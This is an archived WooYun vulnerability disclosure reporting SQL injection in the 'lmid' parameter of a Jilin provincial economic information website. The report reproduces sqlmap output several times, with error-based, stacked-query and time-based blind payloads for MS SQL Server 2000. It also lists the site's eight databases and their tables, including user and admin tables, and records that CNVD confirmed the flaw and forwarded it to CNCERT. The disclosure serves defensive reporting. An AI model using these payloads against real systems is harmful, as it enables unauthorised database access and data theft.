乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-17: 细节已通知厂商并且等待厂商处理中 2015-10-21: 厂商已经确认,细节仅向厂商公开 2015-10-31: 细节向核心白帽子及相关领域专家公开 2015-11-10: 细节向普通白帽子公开 2015-11-20: 细节向实习白帽子公开 2015-12-05: 细节向公众公开
吉林省经济信息网存在SQL注射。8库众多表
http://**.**.**.**/hgjj/hgjjjjsj.jsp?lmid=8a8180251bfd9002011bfdd92ac10049
sqlmap identified the following injection points with a total of 62 HTTP(s) requests:---Parameter: lmid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: lmid=8a8180251bfd9002011bfdd92ac10049' AND 8228=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8228=8228) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'eous'='eous Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: lmid=8a8180251bfd9002011bfdd92ac10049'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: lmid=8a8180251bfd9002011bfdd92ac10049' WAITFOR DELAY '0:0:5'-----web application technology: JSPback-end DBMS: Microsoft SQL Server 2000sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: lmid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: lmid=8a8180251bfd9002011bfdd92ac10049' AND 8228=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8228=8228) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'eous'='eous Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: lmid=8a8180251bfd9002011bfdd92ac10049'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: lmid=8a8180251bfd9002011bfdd92ac10049' WAITFOR DELAY '0:0:5'-----web application technology: JSPback-end DBMS: Microsoft SQL Server 2000available databases [8]:[*] fgw[*] jljjw[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: lmid (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: lmid=8a8180251bfd9002011bfdd92ac10049' AND 8228=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8228=8228) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'eous'='eous Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: lmid=8a8180251bfd9002011bfdd92ac10049'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: lmid=8a8180251bfd9002011bfdd92ac10049' WAITFOR DELAY '0:0:5'-----web application technology: JSPback-end DBMS: Microsoft SQL Server 2000available databases [8]:[*] fgw[*] jljjw[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdbDatabase: tempdb+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.syssegments | 3 |+--------------------------------------+---------+Database: jljjw+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.article | 75607 || dbo.FRefer | 12830 || dbo.Visitor | 8766 || dbo.FMozilla | 5927 || dbo.FIptwo | 3506 || dbo.projectsb | 2657 || dbo.StatDay | 2425 || dbo.plate | 1194 || dbo.plate_view | 1194 || dbo.dzfw | 1144 || dbo.users | 1041 || dbo.filelista | 809 || dbo.FScreen | 533 || dbo.InfoList | 491 || dbo.FArea | 482 || dbo.sysuser_inputcolumn | 194 || dbo.user_view | 194 || dbo.FIpone | 165 || dbo.sysconstraints | 161 || dbo.temps | 143 || dbo.FSystem | 113 || dbo.StatMonth | 96 || dbo.FAddress | 93 || dbo.FBrowser | 63 || dbo.SYS_TMP | 61 || dbo.TH_area | 52 || dbo.IpScope | 33 || dbo.b | 26 || dbo.infofeedback | 23 || dbo.sysuser_checkcolumn | 17 || dbo.userrole_module | 17 || dbo.TH_hangye | 15 || dbo.projectsd | 14 || dbo.sysmodule | 14 || dbo.leavemessage | 13 || dbo.article_StatDay | 12 || dbo.article_StatWeek | 12 || dbo.D99_Tmp | 12 || dbo.StatYear | 12 || dbo.usersb | 10 || dbo.sysuser | 9 || dbo.sysuser_role | 9 || dbo.TH_diqu | 9 || dbo.sysuserrole | 8 || dbo.StatWeek | 7 || dbo.article_FBrowser | 6 || dbo.article_FIpone | 6 || dbo.article_FIptwo | 6 || dbo.article_FMozilla | 6 || dbo.article_FRefer | 6 || dbo.article_FScreen | 6 || dbo.article_FSystem | 6 || dbo.article_StatYear | 6 || dbo.article_temps | 6 || dbo.usersa | 6 || dbo.TH_fangshi | 5 || dbo.TH_tzfs | 5 || dbo.filelistb | 4 || dbo.TH_zblx | 4 || jlsa.infofeedbacktype | 4 || dbo.article_InfoList | 3 || dbo.dealprocess | 3 || dbo.lead | 3 || dbo.syssegments | 3 || dbo.TH_biaoqian | 3 || dbo.TH_jch | 3 || jlsa.infofeedback | 3 || dbo.browser | 2 || dbo.lktype | 2 || dbo.plate_plate | 2 || dbo.projectsa | 2 || dbo.TH_tzfszd | 2 || dbo.TH_xzh | 2 || dbo.TH_zhuti | 2 || dbo.admin | 1 || dbo.config | 1 || dbo.D99_REG | 1 || dbo.FVisit | 1 || dbo.infofeedbacktype | 1 || dbo.leadsort | 1 || dbo.NotDownload | 1 || dbo.projectsc | 1 || dbo.webuser | 1 || dbo.xmpwd | 1 |+--------------------------------------+---------+Database: msdb+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.sysconstraints | 91 || dbo.syscategories | 19 || dbo.syssegments | 3 |+--------------------------------------+---------+Database: pubs+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.roysched | 86 || dbo.employee | 43 || dbo.sysconstraints | 34 || dbo.titleauthor | 25 || dbo.titleview | 25 || dbo.authors | 23 || dbo.sales | 21 || dbo.titles | 18 || dbo.jobs | 14 || dbo.pub_info | 8 || dbo.publishers | 8 || dbo.stores | 6 || dbo.discounts | 3 || dbo.syssegments | 3 |+--------------------------------------+---------+Database: master+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| INFORMATION_SCHEMA.PARAMETERS | 2260 || dbo.spt_values | 730 || INFORMATION_SCHEMA.ROUTINES | 651 || INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379 || INFORMATION_SCHEMA.COLUMNS | 379 || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295 || INFORMATION_SCHEMA.VIEW_TABLE_USAGE | 62 || dbo.spt_datatype_info | 36 || INFORMATION_SCHEMA.TABLES | 34 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 33 || dbo.spt_server_info | 29 || dbo.spt_provider_types | 25 || INFORMATION_SCHEMA.VIEWS | 25 || INFORMATION_SCHEMA.ROUTINE_COLUMNS | 17 || dbo.spt_datatype_info_ext | 10 || INFORMATION_SCHEMA.SCHEMATA | 8 || dbo.syssegments | 3 || dbo.spt_monitor | 1 || dbo.sysconstraints | 1 |+--------------------------------------+---------+Database: Northwind+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.[Order Details Extended] | 2155 || dbo.[Order Details] | 2155 || dbo.Invoices | 2155 || dbo.[Order Subtotals] | 830 || dbo.[Orders Qry] | 830 || dbo.Orders | 830 || dbo.[Summary of Sales by Quarter] | 809 || dbo.[Summary of Sales by Year] | 809 || dbo.[Customer and Suppliers by City] | 120 || dbo.Customers | 91 || dbo.[Quarterly Orders] | 86 || dbo.[Product Sales for 1997] | 77 || dbo.[Sales by Category] | 77 || dbo.Products | 77 || dbo.[Alphabetical list of products] | 69 || dbo.[Current Product List] | 69 || dbo.[Products by Category] | 69 || dbo.[Sales Totals by Amount] | 66 || dbo.Territories | 53 || dbo.EmployeeTerritories | 49 || dbo.sysconstraints | 43 || dbo.Suppliers | 29 || dbo.[Products Above Average Price] | 25 || dbo.Employees | 9 || dbo.[Category Sales for 1997] | 8 || dbo.Categories | 8 || dbo.Region | 4 || dbo.syssegments | 3 |+--------------------------------------+---------+
1
危害等级:高
漏洞Rank:10
确认时间:2015-10-21 15:04
CNVD确认并复现所述情况,已经转由CNCERT下发给吉林分中心,由其后续协调网站管理单位处置。
暂无